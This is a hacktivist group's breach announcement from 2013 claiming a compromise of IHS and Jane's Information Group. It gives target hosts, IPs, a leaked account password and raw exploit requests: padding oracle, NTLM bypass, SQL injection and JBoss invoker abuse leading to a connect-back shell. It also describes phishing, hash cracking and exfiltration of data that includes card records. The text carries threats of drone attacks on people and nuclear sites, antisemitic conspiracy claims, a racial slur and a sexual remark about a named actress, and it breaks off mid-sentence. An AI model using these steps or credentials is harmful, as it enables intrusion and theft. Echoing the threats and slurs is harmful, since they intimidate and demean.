*----------*--------------+----------------:
| PARASTOO | PUBLIC OP | 10 FEB,2013 |
| | PUBLIC REL | |
*----------*--------------+----------------:
|ROOHOLLAAH| IHS HOLDING | CBRN |
*----------*--------------+----------------:
1.OPENING
PARASTOO IS SPEAKING . IT IS NEVER LATE TO
RESPECT FELAZ WHO DID THE HBGARY , STRATFOR
AND THE U.S FEDERAL RESERVE , WHAT THEY
DESERVED . HERE IS ANOTHER PUBLIC
CONTRIBUTION : IHS HOLDING (+JANES
INFORMATION GROUP).
LETS SEE HOW A $1.3B BIZ, ACCORDING TO THEIR
REPORT TO JPMORGAN, COLLAPSES , THEN CONTINUE
WITH PARASTOO's DEMAND IN ITS FIRST PUBLIC
MESSAGE .
+------------------------------------------+
KEYWORDS : ROOHOLLAAH OP , ZIONIST-LED GLOBAL
CORRUPTION , PARASTOO , IHS , JANES , CBRN
(CHEMICAL , BIOLOGICAL , RADIOLOGICAL ,
NUCLEAR) WEAPON , SAYYED ABBAS MOUSAVI , APT
, HOSTILE NATIONS , C4I SOFTWARE , ROUGE
DRONES , IAEA , ISRAEL .
Verbatim text not contained in list item 3
+------------------------------------------+
OVERVIEW :
- TARGET : IHS HOLDING INC AND JANES
INFORMATION GROUP
- ALL SERVERS AND STATIONS PWNED DURING THIS
OP RESIDE INSIDE U.S AND A COMPANY NAMED
HOSTING.COM PROVIDED THE DATA CENTER
- OVER ALL , 22 PHYSICALLY DISTINCTIVE
SERVERS AND STATIONS WERE PWNED
- 8500 RECORDS OF DISTINCTIVE CURRENT
CUSTOMERS FETCHED . ROUGHLY 70% ARE GOVT ,
MILITARY OR THEIR CONTRACTORS . AMONG THE
OTHERS ARE BIG BIZ NAMES LIKE PEPSI(DRINK)
AND BMW(AUTOMOBILE) . RECORDS CONTAIN NAMES
OF CONTACT POINTS , THEIR ADDRESS AND PHONE ,
BIZ HISTORY WITH IHS-OWNED SERVICES AND LINKS
TO OTHER DATABASES ON INTERNAL NETWORK
CONTAINING MORE THAN 450,000 CREDIT CARD INFO
AND PURCHASE HISTORY FROM A ROUGHLY 10 YEARS
PERIOD
- THE ONLY DATABASE SOFTWARE WE ENCOUNTERED
WAS ORACLE , IT WAS OUTDATED BUT EVEN IF IT
WAS NOT WE HAD THE SOLUTION
- WE MET FOLLOWING TECHNOLOGIES : ASP.NET
WEBAPP , JBOSS , SPARC SUN SERVERS , BIGIP
LOAD-BALANCE , ENTERPRISE REDHAT LINUX SERVERS ,
WINDOWS 2003 SERVERS , WINDOWS 7 CLIENT USED
BY INTERNZ
- TOTAL NUMBER OF DATA PACKETS (PRODUCTS)
OBTAINED IS ROUGHLY 6,200,000,000 (8 ZEROS) .
THE OLDEST FILE DATED BACK TO 1998 ON U.S
NAVY SUBMARINE RELATED NEWS .
- WE DID NOT MEET ANY CONSIDERABLE IT DEFENSE
- FROM DECISION UP TO FINAL MOUNTING ALL
RESULTS TO OUR LOCAL SERVER TOOK ABOUT 6
MONTHS . WE OFFER MANDIANT GUYZ GET BUSY
INVENTING A FORMULA TO CALCULATE EXACT
MAN/HOUR AND COMPILE A REPORT ON POTENTIAL
CYBER-PHYSICAL ATTACK SCENARIOS TO HELP
PUBLIC LEARN HOW EVIL IS "USSR" AND CHINA
- LOOK AT THE PIX IN THE FIRST ATTACHMENT ,
YOU SEE PARTS OF THE DATA ARRANGEMENTS . THIS
RELEASE IS MAINLY FOCUSED ON IHS's CBRN
COLLECTION . OUR CURRENT DECISION IS WE
RELEASE EVERYTHING EVENTUALLY EXCEPT FOR CCs.
WE DON'T PRACTICE $ SCAMS
- HERE ARE STATS , USING TEXT PROCESSING .
MINING TECHZ GET YOU WAY TOO FAR BEYOND ,
SHOWED OUR PRIMARY TESTS :
-- ROUGHLY 800 INDIVIDUALS LINKED TO NUCLEAR
PROGRAMS OF 17 ACTIVE COUNTRIES
IDENTIFIABLE
-- ROUGHLY 4500 COMPANIES WHO PRODUCE PARTS
OF A NUCLEAR PROGRAM AND FOR THE WHOLE CBRN
IT GOES HIGH UP TO 11000 COMPANIES DOING
RESEARCH , MANUFACTURING PARTS , SELLING
WHOLE PRODUCTS , CONSULTATIONS , REGULATIONS
, MINING , FABRICATION OF SENSITIVE MATERIALS
, PROCESSING AND REPROCESSING AND WASTE
MANAGEMENT PLANTS AND SITES , DETECTION AND
DEFENSE EQUIPMENT AGAINST CBRN AND
EDUCATIONAL INSTITUTIONS INVOLVED IN
TRAININGS
-- ROUGHLY 3000 EVENT RELATED TO CBRN
INCIDENTS FROM 1999 TO JAN 2013 COVERED IN
DETAILS , SOME HAVE VALUABLE COMMENTS FROM
EXPERTS
-- GEO-SPATIAL INTELLIGENCE ON ROUGHLY 180
IN-SERVICE CBRN FACILITIES AROUND THE GLOBE ,
TO OUR ESTIMATION CLOSE TO 100 FACILITIES
OFFICIALLY BELONG TO GOVT OR MILITARY , REST
APPEAR TO HAVE COMMERCIAL ACTIVITIES
-- GEO DATA ON DECOMMISSIONED SITES ,
HALF-BAKED CANCELED PROJECTS AND GOVT OR
MILITARY PROTECTED AREA THAT POSSES CBRN
CONCERNS AS ACTIVE THREATS OR
REGULATION-RELATED . IT IS GLOBAL
-- ROUGHLY 1900 HAZARDOUS PRODUCTS WITH CBRN
ROOTS AND MORE THAN 300 COMPANIES SELLING
DETECTION AND PROTECTION EQUIPMENTS
-- ROUGHLY 400 INTERVIEWS WITH BALLISTIC ,
MISSILE , CHEMISTRY HAZARD , BIO TERRORISM
AND NUCLEAR RELATED INDIVIDUALS WHO WERE AT
THE TIME OR STILL ARE CONNECTED TO A CBRN
PROGRAM OR PRODUCT
2.INFORMATION BUSINESS
IHS "WAS THE" LEADING COMPANY DEALING
INFORMATION ,INSIGHT AND ANALYSIS IN
PROFITABLE AREAS MOSTLY DEFENSE , SECURITY
AND ENERGY.
BASICALLY , THEY CONTRACTED ANYBODY TO BUY
LARGE INTEL DATABASES AND RECORDS OF VALUE ,
INVESTIGATE THEIR DATA WITH FOLLOWUP CONTACTS
AND AGREEMENTS , SOMETIMES HUMINT-TYPE DEALS
IN ADDITION TO OSINT . THE RESULT MATERIALS
USUALLY WERE GIVEN TO THEIR HIRED ANALYSTS
MOSTLY HAVING A U.S GOVT/MILITARY[OR THEIR
CONTRACTOR] BACKGROUND TO GET SOME VIEW , WE
OBSERVED THEY MADE CALLS TO "AN INFORMED
WESTERN DIPLOMAT WHO TALKED.." OR "WESTERN
INTELLIGENCE SOURCES" AND FINALLY COMPILE A
DATA PACKET ON SUBJECT . ON NONE-CONFIDENTIAL
TOPICS THEY WOULD OFFER A SMALL SEGMENT OF
THESE PACKETS TO ATTRACT MORE CUSTOMERS..OR
WHO KNOWS..MAYBE SOURCES , SIMILARLY TO
STRATFOR AFFAIRS .
IHS HOLDING HAD $16 TO $88 INCREASE PER SHARE
FROM 2005 TO 2012 FOR SHAREHOLDERS AND
$467MIL TO $1326MIL REVENUE GROWTH FROM 2005
TO 2011 . WHY ? A CRITICAL MIND MAY ASK ,
CONSIDERING U.S MARKET IS IN SHITHOLE..
STAY WITH US A BIT YOU WILL GET THE ANSWER .
IHS IS WIDELY KNOWN BY ONE OF ITS OWNED
ESTABLISHMENT , AN ORIGINALLY BRITISH FAMOUS
JANE'S SERIES OF DATA PRODUCTS . MOST PEOPLE
ARE FAMILIAR WITH JANE'S DEFENSE WEEKLY .
THEIR ATTRACTIVE PRODUCT IS HUGE LIST OF
DIRECTORY BOOKS ON MORE THAN 50 SUBJECTS ,
MOST OF THEM STRATEGIC .
OUR BIRDS COLLECTED MANY PIECES OF INTEL THAT
MADE PARASTOO MOTIVATED ENOUGH TO GO FURTHER
BUT WHAT EVENTUALLY MADE IT A TARGET FOR AN
OP , WAS WHAT NEWLY JOINED OLD BIRDS SHARED
WITH US , PRINCIPALLY A MUST TO BE AN ACCEPTED
PARASTOO .
THE OP WAS BENEFICIAL TO OUR CAUSE
THE SAME WITHOUT A RELEASE , BUT ONE OF THE
RECENT STATEMENTS MADE BY UNCLE JOE BIDEN
RAISED MAJORITY OF PARASTOOS VOICES TO HAVE A
"SERIOUS" TALK WITH HIM , THROUGH THIS
RELEASE .
BACK IN THE DAY WHEN THE SKY WAS BLUE AND
"FLYING-ROBOTS" CONSIDERED SAFE , SERIOUS
GUYZ SNEAKED INTO SOME IN-SERVICE NATO C4Is
BY ONLY LOOKING AT PAGES OF A JANE'S C4ISR
YEAR BOOK LEADING TO LOCATE AND "GRAB" SOME
SOFTWARE OF INTEREST RESULTING A VSAT-BASED
HACK INTO A WORKSTATION CONNECTED TO "RED
ZONE" AND MET..YEAH YOU ARE CORRECT IF
GUESSED "AN OUTDATED WINDOWS XP WITH PILOT
SOFTWARE" . WE HEARD THE DETAILED STORY , SAW
THE RAW MATERIALS AND MANY WONDERFUL VIDEOS ,
AND MADE IT A WEEKLY TO ENJOY SEEING WHAT
ELSE IS REACHABLE , THEN , SIMPLY ASKED, WHY
NOT GETTING MORE "SERIOUS" AND HAVE IT ALL ?
SEE , WHEN THE VICE PRESIDENT OF A COUNTRY
THREATS THE LEADER OF ANOTHER COUNTRY TO BE
"SERIOUS" FOR A TALK OR EVERYTHING IS ON THE
TABLE, DOES HE HAVE A CLUE HOW EASY IS TO
HUNT A DRONE AND .., SAY , HIT A SECRET
SERVICE CONVOY ?
DOES HE KNOW WHAT IS NOW AN EASY SPORT FOR
PARASTOO , ONCE HAPPENED TO SAYYED ABBAS
MOUSAVI BY IDF CHOPPERS ,ALTHOUGH A BIT
OLD FASHION WAY ? DOES HE KNOW HOW SERIOUS
IS BURNING ALIVE , WITH FAMILY?
DOES HE KNOW WHAT THE CONSEQUENCES ARE IF A
"HAWK" OR "EAGLE" SUDDENLY GOES ROUGE INTO AN
EMBASSY , OR A SANDIA "MOX" HOLDING COMPOUND ,
OR A 20 ACRES WASTE SITE IN NEVADA BURIAL OF
MORE THAN 1000 TONES DOMESTIC AND IMPORTED
"SERIOUS" MATERIALS THAN EVEN STUPID NRC HAS
OBJECTIONS TO ITS 50 YEARS OLD SECURITY
HANDLED BY AN "EASY" PRIVATE COMPANY? WHAT
ABOUT A FACILITY IN AL-NAQAB DESERT?
IS HE PRESENTED WITH FACTS TO UNDERSTAND WHAT
"SERIOUS" LITERALLY MEAN ? AND IF NOT , WHOSE
FAULT IS THAT? IF THIS ROUND OF TIME A COUPLE
OF PILOT-LESS PLANES PARASTOOJACKED AND GO
VISIT SOME BUILDINGS , PLANTS OR WARHEAD
SILOS AREN'T AT LEAST A BUNCH OF UNARMED
AVERAGE CIVILIANS GOING TO BE VICTIMS OF
THEIR IMPERIALISTIC LEADERSHIP GUIDED BY
ZIONIST-LED GLOBAL CORRUPTION?
3.TARGET AND THE OP
IF YOU ARE NOT INTO TECH , SKIP THE FOLLOWING
HACK BS AND JUMP RIGHT TO ITEM 7 AND THE REST.
FIRST , THIS IS ROOHOLLAAH OP , PUBLIC ,
WRAPPED UP FOR RELEASE AT 10 February,2013.
IHS'S CEO IS Jerre Stead . WE KNEW THE GUY
THROUGH OTHER NONE-PUBLIC OPS ON PENTAGON
CONTRACTORS . MR. STEAD RUNS IHS FOR 12 YEARS
NOW AND BEFORE THAT HE WAS AT "HONEYWELL"
ANOTHER PENTAGON CONTRACTOR THAT IS NOW
CONTRIBUTING TO F-35 AMONG MANY OTHER U.S
WEAPONRY PLAYERS. WE ALSO FOUND MANY RETIRED
OR FRIENDLY PEOPLE CLOSE TO PENTAGON AND A
COUPLE OF U.S EX INTEL COMMUNITY MEMBERS
AMONG IHS EXPERTS.
FIRST AIMED AT:
my.ihs.com AND globalsso.ihs.com
3.1
https://my.ihs.com/Login.aspx?th=janes&callingurl
=https%3A%2F%2Fjanes.ihs.com%2FCustomPages%2F
Janes%2FDisplayPage.aspxFUNNYSTUFFGOHEREANDMAGICHAPPENS
AND
ASP.NET Padding Oracle Vulnerability ON BOTH:
GET /WebResource.axd HTTP/1.1 Cookie:
GLOBALSSO=.pacswb01 Host: globalsso.ihs.com
GET /WebResource.axd HTTP/1.1 Cookie:
LOGINPORTAL=.pacswb01-444 Host: my.ihs.com
DONE.
3.2
HIT ALL ACCOUNTS IN
webmail.ihs.com
BY
investor_relations@ihs.com AND
PASSWORD WAS : "!rootihs"
@Bit Weasil : PEOPLE HARDLY EARN RESPECT BY
OUR STANDARDS . YOUR WORK GOT IT FOR YOU.
WE GOT SSOed ON MOST IHS WINDOWS MACHINES BY
ABOVE MENTIONED LOW PRIVILEGE OPERATOR AND
EXPLOITED OUR WAY DEEPER IN .
3.3
FOLLOWING DOMAINS AND IPs , MOSTLY
GROUPED RANDOMLY IN SAME PHYSICAL SERVERS
PWNED . INFORMATION ON THIS INFRASTRUCTURE
CONSISTS OF BOTH CORPORATE DATA AND THE DATA
PACKAGES AS PRODUCTS . CORP INFO INCLUDES :
3.3.1
CC OF NEARLY 450,000 CUSTOMERS OF
DIFFERENT PRODUCTS THAT WE COULD FETCH FROM
THE ALWAYS FRIENDLY ORACLE SERVERS . EACH
RECORD CONTAINS NAME , ADDRESS , PHONE , AND
IN MOST CASES AN EMAIL IN ADDITION TO MANY
FIELDS REGARDING THE SERVICE AND CUSTOMER
STATUS PLUS CC INFO. WE WERE NOT INTERESTED
IN ALL CCs SO WE DIDN'T DUMPED ALL OF IT . WE
DID NOT STEAL $ FROM ANY OF THESE CCs. THIS
IS NOT A PUBLIC MONEY ROBBERY. WE MADE SURE
WE GET EVERYTHING RELATED TO ISRAEL SINCE WE
READ THEY GET FREE 5TH-GEN FIGHTERS AND JET
FUEL PAID BY AMERICAN TAX PAYERS , ASSUMPTION
WAS THEY CAN AFFORD A COUPLE OF SMALL
PAYMENTS FOR MAGNET-BOMBS AND MOTORBIKES ON
THEIR OWN IF THE CCs SPEND IN BUYING SERVERS
FROM ISRAELI HOSTING PROVIDERS TO PWN
MACHINES IN ISRAEL FOR A GREATER GOOD .. YOU
KNOW..
SHITLOAD OF CORP DATA LOCATED HERE THAT WE
BZIP2ed AS MUCH AS POSSIBLE OF THEM AND
HAVEN'T HAD TIME TO CATEGORIZE YET , LET ALONE
READING..
http://app.ihs.com
https://app.ihs.com
http://remoteapps.ihs.com
https://remoteapps.ihs.com
https://thesource.ihs.com
http://support.ihs.com
http://uk.ihs.com
http://smapservices.ihs.com
https://smapservices.ihs.com
http://mapservices.ihs.com
https://mapservices.ihs.com
http://diw-stg.ihs.com
https://diw-stg.ihs.com
http://vip-diw-stg.ihs.com
https://vip-diw-stg.ihs.com
https://owa.ihs.com
http://sconnect.ihs.com
https://sconnect.ihs.com
NTLM BYPASS AT :
IHSLOGNET.IHSENERGY.COM
GET
/long_inexistent_path12345_/Null.htw?CiWebhitsfile=
:&CiRestriction=b&CiHiliteType=full
HTTP/1.1 Cookie:
ASPSESSIONIDCADRBRQT=KNKFDOPBEOJLJGLKELIKKMFL
Host: ihslognet.ihsenergy.com
AND
SQLI AT
http://www.ihsdrillingdata.COM//DR/ControlCenter/Login.aspx
DONE .
MOUNT POINTS TO SERVERS CONTAINING "DATA" OF
OUR DIRECT INTEREST
http://www1.ihs.com
http://www2.ihs.com
http://www6.janes.com
https://hmmswb01.ihs.com
https://hmmswb02.ihs.com
https://hmmswb03.ihs.com
https://hmmswb04.ihs.com
http://vip-loginportal.ihs.com
https://vip-loginportal.ihs.com
http://vip-janes.ihs.com
https://vip-janes.ihs.com
http://server4.janes.com
http://server3a.janes.com
http://server4a.janes.com
WE STARTED FROM COLFUSION MADNESS HERE :
https://login.ihserc.com/
Server: Apache/2.0.53 (Unix) DAV/2
mod_jk/1.2.15
Location: http://login.ihserc.com:90/CFIDE/
WENT DOWN TO JBOSS , EVERYONE'S FRIEND, AT :
https://login.ihserc.com/cgi-bin/ihslogin
Content-Type:
application/x-www-form-urlencoded
Server: Apache/2.0.53 (Unix) DAV/2
mod_jk/1.2.15
Location: http://login.ihserc.com:90/servlet/
BZIP2ed THE SHIT OUT OF EVERYTHING :
162.usint.janes.com
164.usint.janes.com
165.usint.janes.com
ftpdc.usint.janes.com
lists.usint.janes.com
170.usint.janes.com
171.usint.janes.com
172.usint.janes.com
173.usint.janes.com
174.usint.janes.com
170.207.131.73 ( HOST WIN3 )
170.207.131.74 ( HOST WIN4 )
3.3.2
SERVERS WITH LARGE ENOUGH SPACE TO KEEP
OUR BZIP2s OF ABOVE AND KIND ENOUGH TO LET US
INTO THE INTERNAL NETWORK THAT'S BEING USED
BY EDITORS TO COMPILE DATA AND TURN THEM INTO
PRODUCTS
http://search.janes.com
http://home.janes.com
http://director.janes.com
http://director2.janes.com
https://director2.janes.com
http://online.janes.com
http://director5.janes.com
http://www2.janes.com
https://www2.janes.com
AND FINALLY
http://internal.janes.com
@JBOSS : YOUR HOLES HELPED HUMAN BEINGS MORE
THAN THEIR OWNS , SERIOUSLY DUDE :)
GET /web-console/ HTTP/1.1 Host:
www2.janes.com:8080
HTTP/1.1 200 OK Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.2
(build: CVSTag=JBoss_4_0_2
date=200505022023)/Tomcat-5.5
GET /web-console/Invoker HTTP/1.1 Host:
www2.janes.com:8080 Connection: Keep-alive
HTTP/1.1 200 OK Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.2
(build: CVSTag=JBoss_4_0_2
date=200505022023)/Tomcat-5.5 Content-Type:
application/x-java-serialized-object;
class=org.jboss.invocation.MarshalledValue
JAVA CONNECT-BACK UPLOADED . WELL , TO MAKE
IT LESS BORING FOR ANONZ ..IT ACTUALLY WAS
OUR JRUBY NODE :)
GET /PARASTOO/CBJRU.CGI HTTP/1.1 Accept: */*
Range: bytes=0-99999 Cookie:
JSESSIONID=BB7CA431334324A3E44B49562.P1
Host: www2.janes.com:8080 Connection:
Keep-alive
EXTERNAL IP : 170.207.131.61
INTERNAL IP : 10.67.213.62
ALL GOOD .
HOST : JANES-SUN-6
BASE LOCATION :
FILE:/OPT/CUSTOMER/JBOSS-4.0.2/SERVER
RUNNING CONFIG : JBOSSFORJANES
CPU : 8
OS : SUNOS 5.9 (SPARC)
JAVA VERSION : 1.5.0_16-B02 ( SUN
MICROSYSTEMS INC. )
JASPEREXCEPTION : CANNOT MAKE CONNECTION TO
SERVER AT : K2://ADMIN3.JANES.COM:9920
Port 8080
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.2
(build: CVSTag=JBoss_4_0_2
date=200505022023)/Tomcat-5.5
ETag: W/"1437-12552000"
Last-Modified: Sat, 13 Dec 2008 08:39:12 GMT
Content-Type: text/html
Content-Length: 1437
Connection: close
NOW "ALL DATA PRODUCTS" WERE AVAILABLE
WITHOUT LIMIT .
TO HELP WITH A DEAD-END ON CUSTOMER HISTORY DB
, A COUPLE OF LUCKY EMAILS WITH GOOD OLD .EXE
ATTACHED WERE SHAMEFULLY USED .
@SCARLETT JOHANSSON : GIRL, YOUR UNGODLY NICE
PIX TAKEN AT 2013 IN A THREE SOME , HIT A
+BILLION . IF YOU ARE LOOKING FOR AN EARLY
RETIREMENT WE WELCOME TO GIVE YOU YOUR SHARE
AND PERHAPS WE HAVE A GROUP-DINNER LATER ?
CONTACT US :)
CUSTOMERS INFORMATION
http://customers.ihs.com
http://investor.ihs.com
https://investor.ihs.com
DONE .
3.3.3
HERE GOES ADDITIONAL DETAILS , WORKED
BASED ON MOSTLY JAVA REMOTES , CLIENTSIDES
(~180 XSS AND ~45 CSRF WERE FOUND IN
PRE-ATTACK STAGE ON IHS's SOFTWARE , WE
WONDERED SINCE THEY INSTALLED ORACLE , WHY
THEY LEFT THIS MESS ON THE CODE ? WASN'T
ORACLE GOOD ENOUGH OF A REMOTE-HOLE ? WE
WOULD FEEL INSULTED IF WE WERE JAVA
DEVELOPMENT TEAM .
webmail.ihs.com/170.207.120.1/PWNED/XSS
customers.ihs.com/170.207.131.97/IIS/6.0/PWNED,PORTAL BUG
promevent.ihs.com/170.207.131.97/IIS/7.5/PWNED/SAMESERVER
foodreview.ihs.com/170.207.131.97/7.5/PWNED/SS
graphixmag.ihs.com/170.207.131.97/7.5/PWNED/SS
miningbuyer.ihs.com/170.207.131.97/7.5/PWNED/SS
buyindustrial.ihs.com/170.207.131.97/7.5/PWNED/SS
packagingreview.ihs.com/170.207.131.97/7.5/PWNED/SS
africa.ihs.com/170.207.131.97/7.5/PWNED/SS
arabic.ihs.com/170.207.131.97/7.5/PWNED/SS
vip-globalsso.ihs.com/170.207.140.25/IIS/7.0/CSRF
my.ihs.com/170.207.140.26/7.0/CSRF
www2.janes.com/170.207.131.61/PWNED/JBOSS
vip-loginportal.ihs.com/170.207.140.26/IIS/7.0/SAMESERVER
vip-keystone.ihs.com/170.207.140.29/SNIFFED
TRAFFIC FROM ABOVE SERVER , GRABBED HASH ,
USING A TUNED CRYPTOHAZE ON 4*2 GTX695
RESULTED IN PASS ALTHUGH NOT FAST ENOUGH , WE
ARE FINANCIALLY WORRIED ABOUT THE UPCOMING
POWER BILL
vip-janes.ihs.com/170.207.140.30/REDHAT/SSH/ALREADY
HAD THE PASS
hmmswb01.ihs.com/170.207.225.51/Oracle-Application-Server-11g/0DAY
hmmswb02.ihs.com/170.207.225.52/Oracle-Application-Server-11g/SAME
hmmswb03.ihs.com/170.207.225.53/Oracle-Application-Server-11g/SAME
hmmswb04.ihs.com/170.207.225.54/Oracle-Application-Server-11g/SAME
170.207.225.57/BigIP/PWNED/CONTROLLED THROUGH
A WINDOWS STATION VIA WEB INTERFACE WITH THE
VIP PASS WE ALREADY GPUed
170.207.225.60/BigIP/SAME
170.207.225.66/BigIP/SAME
170.207.225.72/BigIP/SAME
170.207.252.30/BigIP/SAME
ftp.ihs.com/192.77.15.51/PWNED/BRUTEFORCE
ftp1.ihs.com/192.77.15.51/PWNED/BRUTEFORCE
customer.ihs.coM/198.17.75.250/PWNED/MOUNTPOINT/SMB/ALREADY
HAD THE PASS
webport.ihs.com/198.17.75.250/SAME
media.ihs.com/198.17.75.251/SAME
down.ihs.com/198.17.75.27/SAME
cyberdocs.ihs.com/198.17.75.28/SAME
support.ihs.com/198.17.75.85/PWNED/JAVA 0DAY
home.janes.com/170.207.131.60/PWNED/JAVA 0DAY
@ORACLE : IT WAS ABOUT THE TIME WE THANK YOU
OFFICIALLY . SOME SAID WE MUST THANK THE SUN
AND A FEW WENT EVEN FAR BACK TO XEROX AND THE
PARK . THEN THE OLDEST BIRD SAID "YO , WE GO
LIKE THIS , IN 10 MINZ WE HAVE TO KISS U.S
FOUNDING FATHER's ASS ,THE NIGGER AND GUN
OWNERS ,WHO PUT TOGETHER THE U.S CONSTITUTION
BUT FORGOT TO SAVE THE FEDERAL RESERVES BEING
PWNED BY 5 JWISH ELEMENTS WHO ARE IN BED WITH
SAUDIZ , NAH , FUCK THAT" .
A BIT DIRTINESS IN THAT SWIFT OP AND CITIBANK
AFFAIRS MADE US HAVE NOT MUCH TO DISAGREE WITH
HIM , REASONABLY . THOUGH SOMEONE WARNED HIM
ABOUT THE TYPICAL "ANTISEMITISM" BS PEOPLE
WOULD THROW IMMEDIATELY AS A DEFAULT
I-AM-A-GOOD-PERSON" MECHANISM , HE SAID "FUCK
STUPID PEOPLE AS WELL AND GET IT OVER WITH" .
SOUNDED REASONABLE TO US .
AT THE FOLLOWING ADDRESSES WE FOUND HUGE
PILE OF LOGS COLLECTED FROM VISITORS USING
TYPICAL SCRIPTS AND IMAGES SOME CREATED
ONLINE TO COLLECT BROWSER DATA :
stats.janes.com/4.21.139.15/FTP/PWNED/LOGS IN
DIFF FORMAT
ftp.janes.com/204.12.78.67/PWNED/ALREAD HAD
THE PASS/WEB LOGS
images.janes.com/204.12.78.67/IIS/7.5/PWNED/SAME
SERVER/LOG
news.janes.com/204.12.78.67/IIS/7.5/PWNED/SS/LOG
pr.janes.com/204.12.78.67/IIS/7.5/PWNED/SS/LOG
www.janes.com/204.12.78.67/IIS/7.5/PWNED/SS/
CONTAINED A ZIPPED BACKUP OF IHS'S PORTAL
SOURCE CODE ,SOMETHING WE DIDN'T NEED AT THIS
STAGE ANYWAY :)
WE HAD RAISED EYEBROWS SEEING A COOL CODER
GUY APPARENTLY HAS ACCESS TO MILLIONS OF U.S
CITIZEN MEDICAL RECORDS ON HIS LAPTOP , BASED
ON COMMENTS IN THE CODE , PERHAPS WITHOUT
EVIL INTENTIONS . SAME C# CODER INVOLVED IN
OTHER CONTRACTS WITH COMPANIES LISTED IN
HOSTING.COM AS MEDICALZ . THIS WAS NOT THE
TARGET, WE DID NOT MAKE FOLLOWUPS . THEY SAY
THEY HAVE A FREE COUNTRY THERE , WHO ARE WE
TO OBJECT ? WE LIKE CIVILIANZ OF ANY NATION
AND WISH THEM WELL :)
3.3.4
THE INTERNAL NETWORK HAS ALMOST NO
PROTECTION . THE EVIL JBOSS CONNECTS TO
10.67.213.62 . IRONIC FOR A COMPANY OFFERING
INTELLIGENCE , OF THE SERVERS (WIN/LNX) WE
NONE HAD ANY ANTIVIRAL SOFTWARE . IN A MEMO ,
ONE PARASTOO WHO APPARENTLY WAS DEALING WITH
A REDHAT ENTERPRISE 5 HAS WRITTEN "THIS
THING HERE SO FUCKEDUP , LAZYASS SYSOP MADE
NOTEZ ON ~/HOME HOW-TOS EVERY TIME GET RID OFF
SELINUX , SUPPOSE TO BE THE SECURITY".
4.EXFILTRATION
DATA , 14 TB , UNCOMPRESSED FORMATTED DOX ,DB
DUMPZ , DATABASE FILES NEEDED FOR FURTHER
ANALYSIS , AND LOGS.. WAS JUST TOO MUCH TO
MOVE . IN SHORT PARASTOO SPLIT DATA ON
VARIOUS PLACES INSIDE THE IHS's OWN
INFRASTRUCTURE , HIDDEN IN PLAIN SIGHT DURING
THE OP SINCE WE HAVEN'T BEEN SURE YET THAT
SUCH CAREFULNESS WOULDN'T BE NEEDED AT ALL
AND LATER EACH PIECE TRANSFERRED TO BOUNCING
SERVERS , NONE BELONG TO US OR REGISTERED OR
BOUGHT BY ANYBODY INSIDE PARASTOO LOCATED IN
ISRAEL , GERMANY , CANADA , FRANCE , UKRAINE
AND ROMANIA , USING COSTUME PROTOCOL CODED AT
NIGHTS WHILE HAD TO HANDLE NONE-CYBER FACTORS
TO KEEP PARASTOO FLYING GETTING SHOT AT "IN
DAY LIFE" .
5.CONTENT
- POLITICS , ELECTIONS
- TERRORISM
- OFFICIAL MILITARY DATA LIKE ARM SALES ,
DEALS , MILITARY ATTACHE IN EACH COUNTRY AND
RELATED HISTORY , MANEUVERS AND DEMONSTRATIONS
- ENERGY , OIL , GAS , COLE , LASER , PLANTS
, ELECTRIC UTILITIES WITH MANY SPECS
- ADVANCED WEAPONRY , ICBM , UAV , SATELLITE
AND MIL GRADE COMSEC , ELINT , COMINT , C4ISR
, MISSILE SILO TECH , OPTICS , RADAR
- AIR , LAND , SEA BASED WARCRAFT ,
AERO-SPACE TECH
- CBRN : Chemical, biological, radiological,
and nuclear SOURCES , EQUIPMENTS , PROVIDERS
, OPERATORS , DEALS , CONTACT DIRECTORY OF
BIO AND CHEM HAZARD RELATED CONTRACTORS ,
REACTOR , WASTE MANAGEMENT , FUSION AND
FISSION , ENRICHMENT AND EXPOSURE DETECTION
- PRIVATE SECURITY , GUN FOR HIRES , FIRMS
ABLE GET CIGAR AND WHISKEY CLUB MEET WITH A
SENATOR
IT'S TIME WE PAY RESPECT TO IHS FOR AN HONEST
AND TRUE LINE THEIR IT HAS PUT ON TOP OF MOST
WEBPAGES . PARASTOO , PRINCIPALLY, SALUTES A
MAN WITH CLEAR INTENTIONS :
<meta name="description" content="IHS ### The
Source for Critical Information and Insight"/>
6. USE CASES OR EVIL THOUGHTS ?
THERE ARE PIX IN THE FIRST ATTACHMENT . TAKE
A LOOK AND READ ON
LETS READ A COUPLE OF SAMPLES FROM IHS CBRN
DIVISION :
SAMPLE TITLE 1:
SATURN (UNITED KINGDOM), DETECTION (CBRN
UNMANNED GROUND VEHICLES (UGV))
IHS OFFERS:
MORE INFORMATION ABOUT SATURN (UNITED
KINGDOM) IS OFFERED BY JANE’S INFORMATION
GROUP AS PART OF ITS JANE'S NUCLEAR,
BIOLOGICAL AND CHEMICAL DEFENSE SUBSCRIPTION
SERVICE, AVAILABLE IN BOTH HARD-COPY AND
ELECTRONIC FORMATS.
IT IS ONE OF THE 318 VARIOUS TYPES OF CBRN
DETECTION EQUIPMENT ON THE MARKET AND THIS
ONE HAS BEEN USED IN AFGHANISTAN BY BRITISH
ARMY. PARASTOO'S CBRN EXPERT SAYS IF YOU ARE
DOING "STUFF", KNOWING THE DETECTION
EQUIPMENTS IS A MUST , SINCE THE DATASET
COLLECTED BY THEM FEED INTO A PC SOFTWARE OR
A HANDHELD IS VERY OBJECTIVE THUS KNOWING ITS
WEAKNESSES TO OPEN A VALID TECH DEBATE IS
HANDY WHEN INSPECTORS COME ! YOU DIG ?
SAMPLE TITLE 2:
HDT FFA400 - 100 , HUNTER DEFENSE
TECHNOLOGIES (HDT) MANUFACTURE A RANGE OF
CBRN FILTRATION MODULES WHICH HAVE BEEN
TESTED AND FIELD-TRIALLED BY THE US MILITARY.
THE HDT FFA400 - 100 IS A COMPACT SYSTEM
INTENDED TO ENSURE PROTECTION FROM GASEOUS OR
AEROSOL AGENTS, EITHER BIOLOGICAL OR
CHEMICAL. THIS IS ACHIEVED BY THE FILTRATION
OF AIR STREAMS TO ACHIEVE POSITIVE PRESSURE
ENVIRONMENTS OF UP TO 680 M3/H. ITS RATED
AIRFLOW OF 680 M3/H MAY BE ADJUSTED BY MEANS
OF A MANUAL FLOW CONTROL VALVE LOCATED ON THE
BLOWER INLET, TO ALLOW FOR FLEXIBILITY AS PER
REQUIREMENTS. IT HAS AN INTEGRATED ON/OFF
